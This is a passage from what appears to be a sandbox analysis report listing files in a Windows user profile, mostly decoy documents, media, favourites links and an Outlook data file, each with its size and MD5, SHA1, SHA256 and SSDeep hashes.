SSDeep: 768:D0yjAwgEiEkPn5wI9pJUS7NoMVJyTalIQFiWXkbqD+ksd+73r:DbMwgnE25FJUSZoefFiOiqyHdA3r
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\3kKQ7nGkbpOOq-1 5zRt.pptx 97.94 KB MD5: 72de16913661fc565f26c22110b4a8d3
SHA1: d91a31bf71fac90878ec3a74ec4e73999085cac7
SHA256: 43ae7fd4f1f0d697f3b483a9bbe30060481e4a353d340da26a85a33a72245633
SSDeep: 3072:/H3/QPC9WEX5SR8AqfZ0E1SAF7Lcw7QtsyzQPKU://QwWQoFYGE1SG7Lcw7QtvzlU
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\45LEiyxnf Plrmb.docx 92.81 KB MD5: a3f627f5d60e0c09f3d3109b5ffa450f
SHA1: 873f705fc40c2c339c178fa881e9b7e407a2d8e6
SHA256: 799f9a5bfd1b912efb84062764a18cf768d65d12a623d7a70c405a23880a7022
SSDeep: 1536:RTnBz9iY7p+HiyX1lDgrabrTrzn+PHNAZ3H4AZ4C9DaEmULH/sY0E5:BxX69X1GrabXrzeHA3YAUEmULfl0E5
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\5Jnu XQUnVKH6.xlsx 90.28 KB MD5: 7bf670b3c26cf86a62967465d7fedcb2
SHA1: 530b7f991a39550b8694c280ebbf2fcf4a25f188
SHA256: 58aaa39d954ddb703a537cef74f446a7c3c40d0692f2bc4288f0a5deee5bd829
SSDeep: 1536:tuUKx7arqP1hKLIGCYVac5ZiJesbuufe/ETQlqdNwYYCQl0+phCMS82+Wuy:tudGVbCYVayiJesrfeMTQlqdN7e08o8U
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\5W-053pafC.pps 13.58 KB MD5: 941572c923a2abd5876a45b3f2a87de2
SHA1: ef46bd15d787d62ba9c6ae9845d8b480f28e63ca
SHA256: 3ccc757ac2168a2ec005924f3f4aab0c59876bcb8738447a43492962fddc0a58
SSDeep: 384:JQMkU5uM6USO70RWkK7cjXbh6t7zUYpG6ibd2Yid:+LUwMYO70RFK7MMSQGrUV
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\AGokm2hLuNsPkZ.pptx 52.20 KB MD5: fefdd4ab551c28f9d044fd35a820365c
SHA1: 05eacf377e8da91a7b0f622d71d4e682e4a7d656
SHA256: 34767970b4b43633bc889cee53604795ed200be4064f89aa0799342f00ba0533
SSDeep: 768:QyITDzUFOMeFX9N4XgSG3hLLE70FBz1cymT2ukH0ztoxqfg0/rrDxu3bhYVdv2b:QRzUqFX9xfLZFvukHQYmrrUFqv2b
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\BUziw_klSFTDwvC1Vm.pptx 88.17 KB MD5: 46f507e51b2f0cf3e39f440dfa65b427
SHA1: 40f0c05e890eaa85211284c62ec1e434cb3cbced
SHA256: 3a657c34b2da90e951b1e70c8d203f885bdee71999bc649271cea94f82dad606
SSDeep: 1536:Wt90oCXsb1RvjR/wSb6+00VZpevour5fqYW124Tl00FnsCgK7Laz:WwRXMbtICqAOvDd3s24T+anjP+
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Dtk7xvzoVk_gCAUAkb.xlsx 94.02 KB MD5: 4a83f154e1d9f834ae6e13e53b504471
SHA1: 14fc80a91e3f03e60368673c12b89349b1675c4d
SHA256: 57355da81211d0636ff5089c09b37877eb3f4ffd39df28c92dbadee6f9897929
SSDeep: 1536:LIplzf9Xv47KdKGjmHei+o0uwGTcmCam91UVnUka99Seb5yUpniZ+qm25xn9:LI3L9wSo2oIGAmbm3XNiZy2F
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\EDFXHniYi.docx 87.48 KB MD5: 192283640596d5ec53efccbb0faf25c8
SHA1: 8559dbf48ce2aec87b68924fe9a52f435b35be16
SHA256: 99a42c6aee10290b77443b862a7ac69015e2c12089c1f002f365b410b3f5ee9e
SSDeep: 1536:h8xwvaMc4tRdOKvPxw9uhEAmV+d8L3E4r0qLRwC9M0d52PfoxSyaEd12cGT67Svg:+xQaadOKvJALVQgE44GRwCZ5YfoxSyX/
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\G-R5IPPjXNO2pufW-w.pptx 41.87 KB MD5: 3f3cce4f7217310932b96fbbe2216cb1
SHA1: 59c609d27b49737476b16fb323ac237cdef952e8
SHA256: 07a57f42c4c0e1cdb35908c733efbf79eaefd0083ff8cb93504c6acf0b2566a4
SSDeep: 768:WK4Kh0zk4GMR9aIUrgCOnOzM28humplMBmtAEL1UKdsXhNZQ/VRumuf:WK6ksR9WZnWMLOsXrZjj
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\kbQLv1HzRjuGX8_0 ow.pptx 62.54 KB MD5: b3bb349fe4ba7fa2e7e13c5a4da23edd
SHA1: 9aa6e1dec713a188b4acdd50cab1ddbd50ab1318
SHA256: 2d98e61e9c187cf215e6a460bcd896401cbe71e76e87bdbe9485547169f259dc
SSDeep: 1536:ZnbZU6FJcjR6iVMvwWTzC9P/Gb53y2CXrLR8:tbZU6LK8iVCwim/GE2yR8
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\M0viuAr.pptx 21.62 KB MD5: f3899e4a9f9fd0f6a3605fc6bec058c6
SHA1: 6cef060e1080cce89445901e91f08db8a55dd13a
SHA256: 27ec59b65a03d18c6ad01d00690693e4a90a82b715f3f77f1cbfd954edd25591
SSDeep: 384:K8JCbf+N6rtfzlO01cTQ/zx6iqcHoyjenU+GOFl1WXNZyroUte0zEqz:K8JpNGt7PcTGxRqqEUUFlC0UMe0z5z
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mJD0Lk7dF2uj7fNWL.doc 9.44 KB MD5: 1de6d6485cfd114b670f9ab1bbae5c27
SHA1: 7e502d58796d5af273aaa93ecbd7e9d35173e486
SHA256: 7c26fa21015a440d387840f8c52551b12092c8c7511163cb4d392890b1f56b1d
SSDeep: 192:LQrK4Dg6ruSdEUOGl5zST5jG/3MITVyX2aOgYodDnnpxoeP:7l6ZduGz2IU6wXMgYopLV
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mpW-3B9.xlsx 74.14 KB MD5: 399cb7081a0d4ac96051bfa77f4d9e86
SHA1: 75fb0f1deca9052c40b0e36943f87de3cdecfc01
SHA256: 3b912402ffb9e767fa725983a57bcbfbacfab592ec9fce71866a3e48b8d3d6c0
SSDeep: 1536:89vm7Q8R7R561MNth4e1sm5dpIrcnlbsqddAZfhRsKHthcA:aeU8R7RYMNPR15pIw1ddA3RsKthcA
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\umnYAxK8Hd5gj.pptx 4.89 KB MD5: d9fc3a6c427095f6492d5d2c63c8eb07
SHA1: 0e5e7c4330aecadfe645786710e0bc05490281c2
SHA256: e6e0ed8e7bb0d78a94e26304fc712a670d26781e5a3604ed6fdd7e9f97fe1de7
SSDeep: 96:qvuxBM2NjeOb5FPelzGE6Z6K4afSrGHtSrxwScymzT1gf2g0:qv6Vfb5B86JZ6Kr4sME5w2l
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\yNFdhsIRJWbx9.pptx 35.47 KB MD5: 822082c806f745610d4ed91174596489
SHA1: 546ef1a3707539890fde6aabf68fbc080bda844d
SHA256: 8b087352bf738c8efaec82a7405d2fe1d5b6cbb6966d3c9ee16c165270d5d9df
SSDeep: 768:WxTwDtKXze6JTkrOWbOmUGDrEHz8nox1Fvi8zQFx5MYSCFKf+UUbigMAhMLHJkbx:yrIVbOJGDY4oxC8zWx5MYDFY+UUbhsS9
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\-Utu5uTreh3_BFU.mp3 83.66 KB MD5: 8e1b23678946e630e181fed57375c4c0
SHA1: 39edda0c088c1e5c034d09e755fa063eb1d2582d
SHA256: 6151580fbf31ffe7967cc7d336795fa5e31fb4dcae741fb151470ce559a96d91
SSDeep: 1536:kz9BJFeWdz/6cFnhUpaSsNPbUW/MI9n/zsWpj9kAzvFt98rnAHiI4IBgdAi:oJ0WdmKUwSsNP4W/P9n/zsWpxkKFf8rL
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\2ZgBE.wav 64.05 KB MD5: b584fcff9fe90728af28934e4daa2f28
SHA1: 5dff0e6fca86ba3f66d54e01997cac7f2c9db1c6
SHA256: 1bb6d448d2be0333e91e5fa1f0bebc718247fc76bfc5b7dd3982bcf6edbc92a4
SSDeep: 1536:+LQfkOR4w5y77TZ1JEO1HDujwW5JU1zQs+zy7czN0Yi:+GktfaOFWjzy7S0Yi
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\5V1FT5g1rxSJJ41de.m4a 5.18 KB MD5: 361158da77ae8f775b59b1e389672ef4
SHA1: aba9db3995dcab9f697171f9e8c3213463b91b5a
SHA256: ae46fd9b0f977be79d328d035283cc1c4e81d7c16b2a6aba58c08a107691cd07
SSDeep: 96:hPIi8ZSGZO3aV+7TK9NrnS+0vXlCa4gANC3htulwxfQif6EB:6Xy3oIT6S+Qz4gANWhtulwxYG6E
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\7HJiH UDq9SzzeN5I.m4a 65.66 KB MD5: 1789f2f39a630e85bfc4f8bcde6783d0
SHA1: b92fbbb35736a4d05a0d1910b7b8f082b73c8938
SHA256: 6e4c7f2c627a06a9b4e5a9acdf7f0de58ac6ed01dfbeab730c68a1fc5de5fe78
SSDeep: 1536:olG14wSUwJYnDvnLbgcCs0Tbj/TlSoOnIGkyEe4Hu0fT88T:oc1uwff50vs1n95ht088T
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\8ywMFiXrJ1mJNTYk.wav 74.71 KB MD5: 569bea0330939844882b35c66ccd46a2
SHA1: 328e66108690d22e6161efadb1701636c10e2465
SHA256: b4d05c6a0bfb2022a976a34a5609f7c1b196451ebbbe7905a904a20851caaeb3
SSDeep: 1536:bWylAHb3aRhu5Tj1wGs6ssBlNugL6uJRe+kCT7YIoiWGMAWriNUO+MZM:blAWRk1jZsUBlUgL6unrLT7YI4PAWriy
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\LgZcOmajdnsesY.m4a 29.00 KB MD5: b796e586e09beaf1b5c22a39fb1af225
SHA1: b01cc90b2c2f1785681d22dec6e61b5f3bd69d8a
SHA256: 6771e19eca800dc06661934c3d0b8e86842ef0c3b9b30b5d6d5948d9ab231d12
SSDeep: 768:gJM/IV9BCWCcybjb093L3eYgvY0W/Vy133WlB:ZQV9BCaybjb09LeYR0W/e3WlB
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\NN082DlMLC6MxmlQyS42.wav 57.86 KB MD5: bf3eef5f970a766bb235d81906f4df6d
SHA1: 7655c1eb15aa06ecf814bfaaa3187d24de87e8fb
SHA256: 928e9aa1d7ce8e10edb156e26fbba73705c942752a01521fa474617c0a2a4896
SSDeep: 1536:rteCY/vJMohVfDHwgplRH4HRGqkOjT3lGlqdN8zRr:rteCY/vJ7DHwgplZKGqTfI0N8zRr
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\tbTKJ0ZxbS6wZlGEphR.wav 94.54 KB MD5: 10e57792d6ced262b59e1e2d495f81f6
SHA1: 46c1105bc2549bbe6b8a75833ea67f670b025f22
SHA256: 39539b15079cf8e3f6875ed1934a79897b8a5a34877e43639ade28a42f343a04
SSDeep: 1536:v45Fmqlot0kRL56kGBuPB3TGYjyGE2F8OVhM7noYK2hATz7jrx1Ja2ScGogT:v45FpGt0aV6kzP9GYjyx2dM7nLAjoyE
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\wAomAj1M-1.mp3 62.08 KB MD5: fa2c60ea41a96f9d5aefb715edc1cb9a
SHA1: 96db7612753c9179fdc545cc7e6b03b5175ee291
SHA256: d0b5619d5456878ba14f46967827e141d8193d10a1b6ba5c0cdee2b1fd3d88e1
SSDeep: 1536:VzqCjj50ZSvOXpGO7r6ylvUlQXgDpXSeMkrqe8JHSps6qsBCxq1:QCjF0UGwO7rlRUlSgEn7HSCiCxM
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\XQtttNc8l WMW7IPg.m4a 64.78 KB MD5: 6edf5ff63e2e3225e3cf3c6dad0652f1
SHA1: 28f11270e9ca4ab5e969fc68f99065ddc3778c30
SHA256: 20372426f86c4733d3ef11794f5cc4b027a4c5b9b8152ebb5b9951c0990be94a
SSDeep: 1536:cHBKVRKIc/vYruRBpOw/vcC4ZfMF7lRezVsBoidSrrpXMPHq:chOMXr1nXc/k3ez2Boi8rrpIq
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\_D7Y.m4a 10.44 KB MD5: fdab70c23a8676034b8be6148cbec3ee
SHA1: c92edc3a2153a3bd444504ad17839ae195906232
SHA256: 6d5642d96f254269cf2a3ca0b4cd491256c6c747b7480344778a6fc7bfc2ad03
SSDeep: 192:AaCOrehktR99nyMDlPHFGzFoP31r2En613zclg3zT9s8FEG7Yzah58MG:AraEktR99nyMpPFJ1CEn61zc8O8FEG7i
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\-W0-.gif 63.12 KB MD5: 07956e64c8e8c4054bd2b1b61df6fbe4
SHA1: d90817a93edd92c219d0859b96076c94e0d6c6a3
SHA256: 704d10e9e408781edbf0e915d7cc68495b7e4d95d8d5a9cb71aaebc479faecd9
SSDeep: 1536:JY8Zb6xTs95xKObUp6lrCJcWHBHYgXd9xW++nCBMfT:JLZOxTwxKOwp6l2CEHYsSxL
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\Aor58F2ltwiS2qWZJE.bmp 77.20 KB MD5: 086431be998a4a61da2df7ccd402d030
SHA1: 600b16283857623dc0e57ccdf07f7154b190c133
SHA256: f63b913a1fd0bb3fcb3fdee4dcd803294e94ee0112b8cccd7c22110aa4112ea9
SSDeep: 1536:dBrwgKkbuDr2dboIIyPL7+sNJKSPwc1nUSYDhSNUD/MooqOSD7JjnlIG/8:ogKMdboITX+FSPwc1UHhSODkYOSD9lPk
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\FDQ3v_tHbiNjViuE.jpg 43.20 KB MD5: d89c3ccf4a4a814e791498e5befd227a
SHA1: dcadc0da30c69491b6d03436a304ef44b4993c23
SHA256: a4cca4d9d1821163b4e4aa72defba3fd45ff82d74b2ab7a42c5366bcd6874983
SSDeep: 768:5vvNUd/8JUrQpKI1sBa4uQXOmPk4qKhS3/QMEVaqQ2HZUkKI9:5vvNUyOcoo2OmPk4qf39hz25GI9
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\hiUvM1waNbZk-e.bmp 63.58 KB MD5: c5c5806be62ef5ca4035e6c92cda0580
SHA1: 9c6457044a8d0734459995a4b156040bcc0e701c
SHA256: c6f341d4d25fb99b2f0176286e47296054bd6730b8561e7b11f96d7a06880657
SSDeep: 1536:Hd9OuGDPrLjld4DdXc9NnrOpPyW28pjiFJcnrwJaXq75z5HT:Hd9yDrLnWoGyvSjtrwJa67f
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\L4Lb_VKCFG5Baj3.gif 4.34 KB MD5: 2200ca3388cbf2539aaebf523cfffab9
SHA1: 98ea1689df837eec8a56aaf4d9701fa479d28906
SHA256: e77573b27872a8d61d52f9fe8577f44874bbc126d23df48343a217c2e13ad2dc
SSDeep: 96:rVahhjW0EiXdqCRPUysd1r+7iyNnLTft+pLusQBg75xAXrp:JahMRiNPRcyscrT+pLZi8+7p
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\MkdmiW2n2hm UFrse-.bmp 91.01 KB MD5: b204d84e119289dc801cd6d2cccb0d81
SHA1: 98c304db33771bfd0e67394cba212ab678866df4
SHA256: a217c662247e5543aca5b7560d4ec012d8451cfec5c95f646e3edef3187696ef
SSDeep: 1536:/hIkWquKvejqYI03euyLnuT7KbQQjfIFaHf9gaMFldsmtcAhCOkEsdvJOwDc6yp1:/4KveHI04uXK9kuFyFl7AJDOrKPW
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\OFMo70Ypi.jpg 24.18 KB MD5: 7f4fbb0f3e6ebedf285f711115b51f8a
SHA1: 95030d0a373198cef67759d11875d5fc68003791
SHA256: 3242ea955bf2b9b99931a6f534e6c13d19822b9d6c12e2da66533c194e6e27af
SSDeep: 384:LKshCpfS5Pl50/T8SE70XXjdcf0VvoccSqbAI0NwTdjusk+N0Q31KpypKXpk0Te:WshCctw6m5csVgY9I/T5uJq0ofK5/e
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\VyatE0vXWAqC0OxRt_.jpg 10.45 KB MD5: 50a2b3d3ce6141d004651dd0373945bb
SHA1: 1f7c547b3914af6d035eb1fd04b6de735098282c
SHA256: 12edfc25938cff79db30e3fa76ab987d7c394a59d8f34e46f06ccdb2636a7991
SSDeep: 192:Q84nKScMEpp+D6i4YxKlVW4rayJCqnUhunpwLnPLHwrJb:Gn/CpM783NwHA5
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ReEw7jE5wqOg.swf 75.38 KB MD5: 5d3363fe856a6ccc5fbeaefa75aa7548
SHA1: 6f64991deec519cbb4f37ff67c9ef23a98ebab97
SHA256: fdba71f735d122a75719910a72a74a9ddd6adbea02efba38940f23bf3cc05163
SSDeep: 1536:qPeptujcLMQHt9jYuPGcngPJ9XXZKOJK5LhW2Z7YMuAkJtE9w4h:qPeNWWGcgPJ98YQL047tuhLE9wq
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0oqCmMdMfyA -VyQ\gW8MJuJm9dKBS.swf 87.03 KB MD5: 3cf2c04707467e93fbf929bb3ef8a19f
SHA1: 7a1cd0f31b6bc5ccd3ca40d75d7d294d0ea36357
SHA256: 8300ffd770d5a6c4c4dd52244ef930ecf6be737a4178ff2fc25ff53e3cedfc08
SSDeep: 1536:pPDh0lSa6JHPnXbZbe4b51va2Aep3XrTyqB/HcRM1oSJSRt3a1:pS0PnXdv55pnpL2s/HcIKR0
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\cJ1uF3yzdYr\6lkmIZ.jpg 76.67 KB MD5: 8cafc70d348d501dd2d66d182b807f44
SHA1: 559191c9046fee74e6577421fa390d0656d267f6
SHA256: 56d76a3d68e03ae22eed1ee58c75f0103452fe682f75513cc9fd444ee043f71c
SSDeep: 1536:YKP41R4Jyrj/g6+ckCg9sSEtZmfkUCivsTETHIJsLKAQJCflJqmvLl5gX:YidmECBSsmfxCiET+ICLyEYOLl5gX
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\cJ1uF3yzdYr\bYco6U CoNywT.ots 50.06 KB MD5: 13b72a1c96a01184c987398086d13130
SHA1: e99a2fb46c7ffa0b7969680c51a067051433a5a7
SHA256: 31b02b4b253a04cdecc5e7a871204649a7f191d697609391f59f1a4afe526a89
SSDeep: 768:O+AQYWrG5dTC6nX6q+FU58Mr4L4jgm/Kcawd3i9sq4kTn+OS4g5a7mKk6SAY:O+/wdTC6EDMr4l3cawJi9ZNTn+OCyUAY
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\cJ1uF3yzdYr\sH_lIdhNg4 u9hq.xls 25.49 KB MD5: b9a55e64a9c1e6db0b5bf1a40e01ebc0
SHA1: 5f71280c06056d3b4986781d5ecdaab20d0bd293
SHA256: 619bb83cd88087c0c76e3f2d00d1ea1d6c7f4d687f949acfe4c66e31d55e6b39
SSDeep: 768:utRyf8o0CIiNfwpGjtiDxWlZuhcaC1oXRLK:Sk0iZrEA041ohLK
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\cJ1uF3yzdYr\UB qDPSTcD6SsAM5.pdf 41.09 KB MD5: 8bf556cf965a8f21a434198433f2b8e4
SHA1: dada660f273d200e4cfd4f31f147521bd50b8a24
SHA256: 757bad01f06376637d96e0e0418b0c656e453b24b9b88a509c1e33b68a470569
SSDeep: 768:IX4X7MafgUqtCYaCcCTN/eBFT6RUYL1UBXJXKl:w4gUqsYXcCTS6R1+NJXKl
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\4k4 81HVDXuJOl.odp 25.46 KB MD5: 0c1cfb927b1a1431ca654a96ac6d3664
SHA1: 63ceae1cf654a19104b136a42d82355f24e238df
SHA256: c19d7f186e2043addcc3955d95b2596f2227cfab30eb16fae112f6567a013965
SSDeep: 768:+UVBeefKSZSEH1LYO2OiGD20PIdO8i3CITOSAy6XWqe91:11fUC1LYOsG5gdO3CcOSx6GDL
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\Rqjkx-Inyu564.bmp 65.02 KB MD5: 636891bd306d334991e73df6c28e3955
SHA1: b54713b64f3e8c6c457b386984d45380f078df96
SHA256: 1c08fb276f744488b292b89412b11288c7847fe24c05d125e2f03b96dc77af2d
SSDeep: 1536:62jn3Mv3N3R+ptpcjI31ybg4zWjcPIcQmJM75g3sVBFor:Zn3MvBR+h31r4zWYBcdUsVUr
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\wWuRiwRN3-J7Oj9WP.jpg 50.90 KB MD5: 2d62478ae86865e01f6f5ac77f2b119a
SHA1: cdce9bee12f47cb6d7bd8a4ccd7b1ab81edd94cb
SHA256: d7849d59f5957960d4fea0e1d758cacf3e498af075227d139abf7db9e3bea044
SSDeep: 1536:fYGqP4o9lD9SJFbBToHkHL/eq0nKlUnW8nOBE:fwBulqEHrXqgb8wE
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Outlook Files\voeimd@djhreuu.uhd.pst 265.08 KB MD5: e79c11a09aff4645c6ec0a793082fb41
SHA1: fedac5a1c9d9a2dbbb8dba2cf6d2b8466f1084c3
SHA256: d7f73ea970769a94d030ae7507b037118f41c71ebef162f1b9ed45f76f0d0ed3
SSDeep: 3072:22HfBneZr9IFne6dnPRxa4+UHo5wsj5pOmv64Gs7/714Z+afuNnKAs:1xSqlnPfHvqvl7zi+amxs
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\foWRjFtWYtlcWkIBF.ppt 35.20 KB MD5: 4444197582844660df42089525efd1bd
SHA1: dbe5402a6805b3cee90fe3553c072b5016d27e22
SHA256: 2710b7a173ce33faa846b3f83a8bd9979a34a8a294d9dc1aebc520b8f0de078d
SSDeep: 768:eX9KXFfQVtie0jKXNV1ATj6YnAHJjgKefYWHbHYcEFXRIlfrxyOhU:65mjKyv6YsJjgKefYaTYzNR2MOi
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\l8IL3_dOyLyH.odp 95.46 KB MD5: c3581324f7720d561a2b59b917732a1f
SHA1: b7f1dbb11dbc20e4d86a716833eb4f0b568db728
SHA256: 7603f2c3876c352502e04b0f8d74cf4738e4dfbcdb658c48bb0e25c43d624fb0
SSDeep: 1536:aY9yA8xTJFu/3NBDDpVrgCpyM9QxDdI8Jb2l5+JggZO/LwmrkBUfjF1OrzyA3S7A:aNA8xqznpHpMxS245+igZ+6Ufh1O3h3t
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\QITXJJCFSuy.rtf 64.99 KB MD5: 3c6f30df0a3e795cb39d6d43173f6deb
SHA1: 8d8d7de94a585ea7f18c49fbf604958d5985b0d7
SHA256: a57026c36be7f0f46aa05b19f6ab48e281a7c05542e68f760e1fad0f3fe5c7af
SSDeep: 1536:aGmEvqtpS69xZam3V5/iOiZ0+1Y++dnHmY0Vwkii/XHly:XJy7lV5/GuSBUH8wf2Hly
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\wYeZ7WgnHNP8l.rtf 57.14 KB MD5: 5c5639fcde5c13940a1aa3e3e25eea00
SHA1: 3c855423a33d1eb97fb7ba725c5b3f24004a9a64
SHA256: a53db9190af68aba219d80e2bebb11daaa91e524542ab984044dd1372ff1f204
SSDeep: 1536:XNcA5zc8l9olhgz6YHYuTyDvsLq8YbkfUZZTHiTz:yA5j9oLs6YHYuTMkLqjzyz
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Suggested Sites.url 314 bytes MD5: d274d5f98733903169baed1faabd47d5
SHA1: f49184dd8e51774890a9b6bc1d31b48adfa2179c
SHA256: a68b38273445b312f20c9fd61a84f0e86f5e6797c4f6799f56ff9e11fe1e588f
SSDeep: 6:Jnj6/Bb33qkx6TurITRh97fsgft2cKtFnC47+X6SUkyljawudkqSMeEPh7Wcii9a:lE533Ncl7kgVBKvZCylGwBqSMeEPsciD
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Web Slice Gallery.url 304 bytes MD5: a0fefb5d36c911088ed4847639cd74e1
SHA1: c40396d8ecea752ad22a2fc3c812605f813cc2f2
SHA256: da2d599d23a631513b72f4412abf40fef356949defaf070f401d30a6475fc876
SSDeep: 6:Jnj6/BPUn3fTDJEk/fUDLYlWJFlX3SORFIK4NW5udkqSMeEPh7Wcii96Z:lEc3fTtE4MIWJLX3fKKMsBqSMeEPsciD
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE Add-on site.url 211 bytes MD5: 055d3a787413614bf829f6ae6625cc31
SHA1: fb6a3349e7d69a605e93bef63422174aab06f9e4
SHA256: ba5a18368818af36b0d6307bfb6b1a80d711ec683ca62fc76a231d18955eeb92
SSDeep: 6:Jnj6/BPUn3fTDJEk7wxWudkqSMeEPh7Wcii96Z:lEc3fTtETxWBqSMeEPscii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Home.url 211 bytes MD5: e10624fbc9652ec36e37edd98999b635
SHA1: d8dc9dcc1048859ffe6f05dada8d545541f4454d
SHA256: f4ef9bf15a4d8f229c6324d974d30d97e40c18caa4072fc4e3b0174948ba4c61
SSDeep: 6:Jnj6/BPUn3fTDJEAnhIudkqSMeEPh7Wcii96Z:lEc3fTtEISBqSMeEPscii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft Store.url 212 bytes MD5: bb2ed6d1ec2100f22f95a517a13eb174
SHA1: 78d6a2df4cb207b25aabf67d4002623a25baa1ce
SHA256: c7c4f95bc1a727ca93ed874b9309fdda5b91127cf5ef3eb0de1673d5564edff5
SSDeep: 6:Jnj6/BPUn3fTDJEEsZpn0S5udkqSMeEPh7Wcii96Z:lEc3fTtEv5VBqSMeEPscii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Entertainment.url 211 bytes MD5: dd9712cb46511150dbfe45835ce42c0f
SHA1: 515d1447368aad5f623ed86f7e85ec2d4b3fff2f
SHA256: 5dfbc209712286482490d3addce3d4b4ff0ac19629e12086fe0ff30717b88952
SSDeep: 6:Jnj6/BPUn3fTDJEkqdUudkqSMeEPh7Wcii96Z:lEc3fTtEQBqSMeEPscii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Money.url 211 bytes MD5: 7a6238a00ac32018029e0c5684359573
SHA1: b422254fa7333a62d9b791588b25edb67d1bc5cb
SHA256: ba5113cdacb1e2c2527741a6c43b1ce9e2dc6027ea68f722bcf6beb3c04fda40
SSDeep: 6:Jnj6/BPUn3fTDJEkqRYYudkqSMeEPh7Wcii96Z:lEc3fTtEEYBqSMeEPscii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Sports.url 211 bytes MD5: b7144e0457c92bf9355692df1b7848aa
SHA1: 1be00b2b12f4b1e0af4c619cf7e00989c91c55e6
SHA256: 6644683b1be3fed959b2d5221deb5d06e24983a437a361acb7a58137e96ee807
SSDeep: 6:Jnj6/BPUn3fTDJEkq38WudkqSMeEPh7Wcii96Z:lEc3fTtEd8WBqSMeEPscii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSNBC News.url 211 bytes MD5: f9393bd3e06707c02cd139388feac71e
SHA1: d8b07508c31b18f7a149b0bde98e2bfa2474616d
SHA256: 4dfb09c7bb9d672164f8bc31254a9592ab6661de95cadd2feb505ff1f02cb287
SSDeep: 6:Jnj6/BPUn3fTDJEkqbUudkqSMeEPh7Wcii96Z:lEc3fTtEVUBqSMeEPscii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Spaces.url 211 bytes MD5: 1567d4518eef07ae0bf71c8b99978b75
SHA1: 2775eef83e60328fa3157b4e26a84b83a5a457cb
SHA256: ea388f526aac63ccc42b49a36830c5c6fc51f5db80d778fd87c326d2ceaee231
SSDeep: 6:Jnj6/BPUn3fTDJEkqFY0udkqSMeEPh7Wcii96Z:lEc3fTtEtBqSMeEPscii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\AwfOXmr1.mp3 62.90 KB MD5: e529d9659990910fefa2b29b3d843e61
SHA1: d540379b9ff3c0be4e3ee97bb7d7a7097afbcd33
SHA256: dffba3c23c54e929e3f0482884be17f6491c522b3a59134214ae2fe4b491dc7d
SSDeep: 1536:R7ZykqEs1hCgQaJ0UxlSXBSMj1BzPZwp7KmhGi5tu:R7IXEs1uaJ0UxLMj1BrZwsti5tu
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\hd0rzFg.m4a 16.79 KB MD5: 73dbcd5abc3f434c11af158f53276892
SHA1: 7ccabcc3e8cff79d994219471db94fb436e4c43d
SHA256: c2808d72674acd3b699c0555b7bc43ddd86c4d23eda1aa77d8a125cdc1a988fb
